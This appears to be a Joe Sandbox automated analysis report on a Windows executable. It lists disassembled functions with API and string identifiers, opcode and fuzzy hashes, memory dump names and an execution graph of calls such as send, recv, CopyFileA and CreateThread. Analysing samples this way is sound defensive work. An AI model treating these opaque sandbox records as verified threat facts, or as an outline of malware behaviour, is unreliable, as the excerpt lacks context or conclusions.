                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    • Opcode ID: ae964e21df4615f733d3523d43de523770077db340beae7310f889840b7a9f9a
                    • Instruction ID: c7a87440c0c0791733aaf6b2d344e0125fd61d03a9f69bc91d41d93aa0138a1d
                    • Opcode Fuzzy Hash: ae964e21df4615f733d3523d43de523770077db340beae7310f889840b7a9f9a
                    • Instruction Fuzzy Hash: 93F04952A1CA0391FA257F1B9CC89789691AF46744FC85C32C54E8A2D5DFACFDB08320
                    Function 00007FF704898A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CloseErrorHandleLastNextProcess32
                    • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                    • API String ID: 1692733154-1215713629
                    • Opcode ID: 80b9a6db2b2e48e89f54032db637bcab0a296bca92d97ce77ee6742c3cbdaec9
                    • Instruction ID: 4469c91b7d68904236888b656b5051cef233a64307493756cb379c5243394726
                    • Opcode Fuzzy Hash: 80b9a6db2b2e48e89f54032db637bcab0a296bca92d97ce77ee6742c3cbdaec9
                    • Instruction Fuzzy Hash: 9DF04952A1CA0391FA247F1B9CC89789691AF46744FC85C31C54E8A2D5DF6CFCB48320
                    Function 00007FF70489193C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: CriticalDeleteSectionfclose
                    • String ID: Done$[I] (%s) -> %s$debug_cleanup
                    • API String ID: 3387974148-4247581856
                    • Opcode ID: 5700e670ed7aaba7f243cf6607a1127b37ceffefebeb6df78e18ccad7f903a36
                    • Instruction ID: 1ef67a8925e6efa2f31f034159d19865aa0f6cd2052f5408678354a2b6ab98fb
                    • Opcode Fuzzy Hash: 5700e670ed7aaba7f243cf6607a1127b37ceffefebeb6df78e18ccad7f903a36
                    • Instruction Fuzzy Hash: 08F09222A09A4395FA59BF62ECD8B75A360AF40704FC81D75C40E566E1CFFC64B9C760
                    Function 00007FF70489A96B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualProtect.KERNEL32(?,?,00007FF7048AA1E8,00000000,?,?,?,00007FF7048AA1E0,00007FF704891208,?,?,?,00007FF704891313), ref: 00007FF70489ABC2
                    Strings
                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF70489AB5D
                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF70489AA62
                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF70489AAEB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                    • API String ID: 544645111-1286557213
                    • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                    • Instruction ID: 72045ffdf21e4fa4d723c854461cabe410fe6933f31c1124e8c6bb17802ca1a2
                    • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                    • Instruction Fuzzy Hash: FA617362F0898286FA18AF17DD80A78B7A1AF44B94F884931D91D477D5DF3CF9A1C720
                    Function 00007FF7048919C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorHandleLastModule
                    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                    • API String ID: 4242514867-2427012484
                    • Opcode ID: 999751950b3b76576846fd9a6e2c41b244daa48ae7a457a6485a6069d3df73eb
                    • Instruction ID: 8f617b198e1adb48d387326949c45649fedd51d2b5e152ef001e3f4cd5c23534
                    • Opcode Fuzzy Hash: 999751950b3b76576846fd9a6e2c41b244daa48ae7a457a6485a6069d3df73eb
                    • Instruction Fuzzy Hash: 5DF01C21A0CA4380F720AF56EC88B69A761EF44398FC80535C64D026E8CF6CF578C720
                    Function 00007FF7048A0150 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Byte$CharMultiWide$Lead_errno
                    • String ID:
                    • API String ID: 2766522060-0
                    • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                    • Instruction ID: 5ceaedd8e5ff4252ccf8d211fecd92596241c29698e12df3a17b3be0da4bbc2b
                    • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                    • Instruction Fuzzy Hash: 6431C773E0C38149F7715F229C80B69A690EF8678CF844535DA89477D5DBBCE4758720
                    Function 00007FF70489AC27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: signal
                    • String ID: CCG
                    • API String ID: 1946981877-1584390748
                    • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                    • Instruction ID: 98dac50c8f41f47a89c735b5ab7403489a1c1ef86295dc9d9b543d3070f0c63f
                    • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                    • Instruction Fuzzy Hash: 82218021E0D98247FA7C7A168CC1B7891819F85329FAD8D35C90E8A2D5DF9DBCB19221
                    Function 00007FF70489A6D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-3474627141
                    • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                    • Instruction ID: d0bf13d4e1a2db6f2e217db34e83333d9b5ae3fcacbd06cb97bd9f8f9794eed3
                    • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                    • Instruction Fuzzy Hash: BB11A362808E84C2E2119F1DE4417EAB370FF9A359F545722EBCC26264DF7DD162C700
                    Function 00007FF70489A710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4064033741
                    • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                    • Instruction ID: 0b1ad8778f964faa5d594e7bb27fce07ef189f8926d9629de5d14caaeac99113
                    • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                    • Instruction Fuzzy Hash: D5F06D67808F8482D2119F19E8406ABB370FF9E389F645726EBC926668DF6DD5228710
                    Function 00007FF70489A707 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2713391170
                    • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                    • Instruction ID: a693a40f9b44a14af97dd645d4e22728049b8ee99a4f0bee69c5beac8772fcd9
                    • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                    • Instruction Fuzzy Hash: 62F06D67808F8482D2119F19E8406ABB370FF9E389F645726EBC926668DF2DD5228700
                    Function 00007FF70489A72B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2187435201
                    • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                    • Instruction ID: c7f659212fad4d9515d1e7930b1784064836ff05a0826d9cfc923daee52bb887
                    • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                    • Instruction Fuzzy Hash: B4F06D67808F8482D2119F19E8406ABB370FF9E389F645726EBC926668DF3DD5228700
                    Function 00007FF70489A722 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4273532761
                    • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                    • Instruction ID: b0372e98b2bb340b9e4a89bfd6f433199ac907dd8596c4db958e8bccaaf41090
                    • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                    • Instruction Fuzzy Hash: 05F06D67808F8482D2119F19E8406ABB370FF9E389F645726EBC926668DF2DD5628700
                    Function 00007FF70489A719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-4283191376
                    • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                    • Instruction ID: 235d3d3d65da40c2969a59d22fad221ccdc94dba7fac17105d334b65224917ae
                    • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                    • Instruction Fuzzy Hash: AFF06D67808F8482D2119F19E8406ABB370FF9E389F645726EBCD26668DF2DD5228710
                    Function 00007FF70489A734 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: fprintf
                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                    • API String ID: 383729395-2468659920
                    • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                    • Instruction ID: cc0c3280b690b3a5492972b510ec3d4c2158797aafa69587b0ac0dc0ed01c6b9
                    • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                    • Instruction Fuzzy Hash: E6F06D67808F8482D2019F19E4406ABB370FF9E789F605726EFC826668DF2DD5228700

                    Execution Graph

                    Execution Coverage:6.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:3.2%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:35
                    execution_graph 58663 7ff8bfab6230 58664 7ff8bfab625b LeaveCriticalSection 58663->58664 58665 7ff8bfab6238 58663->58665 58674 7ff8bfab61e8 58664->58674 58665->58663 58680 7ff8bfab1cbd 58665->58680 58667 7ff8bfab626d GetProcessHeap HeapFree 58667->58674 58668 7ff8bfab634c Sleep SleepEx 58669 7ff8bfab635c EnterCriticalSection 58668->58669 58671 7ff8bfab6380 58669->58671 58670 7ff8bfab629b EnterCriticalSection 58672 7ff8bfab62be LeaveCriticalSection 58670->58672 58670->58674 58673 7ff8bfab63b1 LeaveCriticalSection 58671->58673 58675 7ff8bfab6398 GetProcessHeap HeapFree 58671->58675 58672->58674 58674->58667 58674->58668 58674->58669 58674->58670 58674->58672 58676 7ff8bfab62dd 58674->58676 58679 7ff8bfab9a80 GetSystemTimeAsFileTime 58674->58679 58675->58671 58691 7ff8bfaba202 58676->58691 58678 7ff8bfab632b EnterCriticalSection 58679->58674 58681 7ff8bfab1ce8 58680->58681 58682 7ff8bfab1d6c 58680->58682 58681->58682 58684 7ff8bfab1ced 58681->58684 58683 7ff8bfaba202 6 API calls 58682->58683 58687 7ff8bfab1d40 58683->58687 58685 7ff8bfab1cf6 send 58684->58685 58688 7ff8bfab1d39 58684->58688 58685->58684 58686 7ff8bfab1d1a WSAGetLastError 58685->58686 58689 7ff8bfaba202 6 API calls 58686->58689 58687->58665 58688->58687 58690 7ff8bfaba202 6 API calls 58688->58690 58689->58688 58690->58687 58692 7ff8bfaba210 58691->58692 58702 7ff8bfabb210 58692->58702 58695 7ff8bfaba297 fwrite fflush 58698 7ff8bfaba2c0 58695->58698 58696 7ff8bfaba2cc EnterCriticalSection 58697 7ff8bfaba2e6 LeaveCriticalSection 58696->58697 58699 7ff8bfaba303 58696->58699 58697->58695 58698->58678 58700 7ff8bfaba33d CopyFileA 58699->58700 58701 7ff8bfaba375 58700->58701 58701->58697 58703 7ff8bfabb235 58702->58703 58704 7ff8bfabb21e 58702->58704 58709 7ff8bfabc24b fputc 58703->58709 58708 7ff8bfabc24b fputc 58704->58708 58707 7ff8bfaba269 58707->58695 58707->58696 58707->58698 58708->58707 58709->58707 58710 7ff8bfb83afd 58717 7ff8bfb83b0a 58710->58717 58711 7ff8bfb83d1a 58712 7ff8bfb83b2b Sleep 58712->58717 58714 7ff8bfb83ba7 Sleep 58714->58717 58715 7ff8bfb81292 19 API calls 58715->58717 58717->58711 58717->58712 58717->58714 58717->58715 58718 7ff8bfb83a94 58717->58718 58725 7ff8bfb89c52 26 API calls 58717->58725 58719 7ff8bfb83abb 58718->58719 58720 7ff8bfb83aa5 58718->58720 58722 7ff8bfb83ada 58719->58722 58726 7ff8bfb820ea 58719->58726 58720->58719 58723 7ff8bfb83adf 58720->58723 58722->58717 58737 7ff8bfb8923e 58723->58737 58725->58717 58727 7ff8bfb82178 58726->58727 58728 7ff8bfb82104 58726->58728 58730 7ff8bfb81292 19 API calls 58727->58730 58728->58727 58729 7ff8bfb82109 recv 58728->58729 58731 7ff8bfb8211f 58729->58731 58732 7ff8bfb8212c WSAGetLastError 58729->58732 58736 7ff8bfb82123 58730->58736 58735 7ff8bfb81292 19 API calls 58731->58735 58731->58736 58733 7ff8bfb82140 58732->58733 58732->58736 58740 7ff8bfb81292 58733->58740 58735->58736 58736->58722 58738 7ff8bfb820ea 21 API calls 58737->58738 58739 7ff8bfb89247 58738->58739 58739->58722 58741 7ff8bfb812a0 58740->58741 58751 7ff8bfb8ed60 58741->58751 58744 7ff8bfb8135c EnterCriticalSection 58747 7ff8bfb81376 LeaveCriticalSection 58744->58747 58748 7ff8bfb81393 58744->58748 58745 7ff8bfb81327 fwrite fflush 58746 7ff8bfb81350 58745->58746 58746->58736 58747->58745 58749 7ff8bfb813cd CopyFileA 58748->58749 58750 7ff8bfb81405 58749->58750 58750->58747 58752 7ff8bfb8ed85 58751->58752 58753 7ff8bfb8ed6e 58751->58753 58758 7ff8bfb8fd9b 14 API calls 58752->58758 58757 7ff8bfb8fd9b 14 API calls 58753->58757 58756 7ff8bfb812f9 58756->58744 58756->58745 58756->58746 58757->58756 58758->58756 58759 7ff8bfab660a 58760 7ff8bfab661c 58759->58760 58761 7ff8bfab67a6 58760->58761 58763 7ff8bfab665d Sleep SleepEx 58760->58763 58764 7ff8bfab66ef GetProcessHeap HeapAlloc 58760->58764 58772 7ff8bfab1c0a 58760->58772 58763->58760 58765 7ff8bfab6716 memcpy 58764->58765 58769 7ff8bfab667a 58764->58769 58766 7ff8bfaba202 6 API calls 58765->58766 58768 7ff8bfab6776 EnterCriticalSection 58766->58768 58767 7ff8bfaba202 6 API calls 58767->58769 58768->58769 58769->58760 58769->58767 58770 7ff8bfab66c4 memcpy 58769->58770 58771 7ff8bfab66ae LeaveCriticalSection 58769->58771 58770->58760 58771->58769 58773 7ff8bfab1c24 58772->58773 58774 7ff8bfab1c98 58772->58774 58773->58774 58775 7ff8bfab1c29 recv 58773->58775 58776 7ff8bfaba202 6 API calls 58774->58776 58777 7ff8bfab1c3f 58775->58777 58778 7ff8bfab1c4c WSAGetLastError 58775->58778 58779 7ff8bfab1c43 58776->58779 58777->58779 58782 7ff8bfaba202 6 API calls 58777->58782 58778->58779 58780 7ff8bfab1c60 58778->58780 58779->58760 58781 7ff8bfaba202 6 API calls 58780->58781 58781->58779 58782->58779 58783 7ff8bfab63cb 58801 7ff8bfab63db 58783->58801 58784 7ff8bfab65ed 58785 7ff8bfab65f3 58784->58785 58863 7ff8bfab14c5 58784->58863 58789 7ff8bfab640b Sleep 58789->58801 58790 7ff8bfaba202 6 API calls 58790->58801 58793 7ff8bfab14c5 10 API calls 58793->58801 58795 7ff8bfab64b6 GetProcessHeap HeapAlloc 58796 7ff8bfab64dc CreateThread 58795->58796 58795->58801 58797 7ff8bfab65a0 GetLastError 58796->58797 58798 7ff8bfab651f EnterCriticalSection 58796->58798 58799 7ff8bfaba202 6 API calls 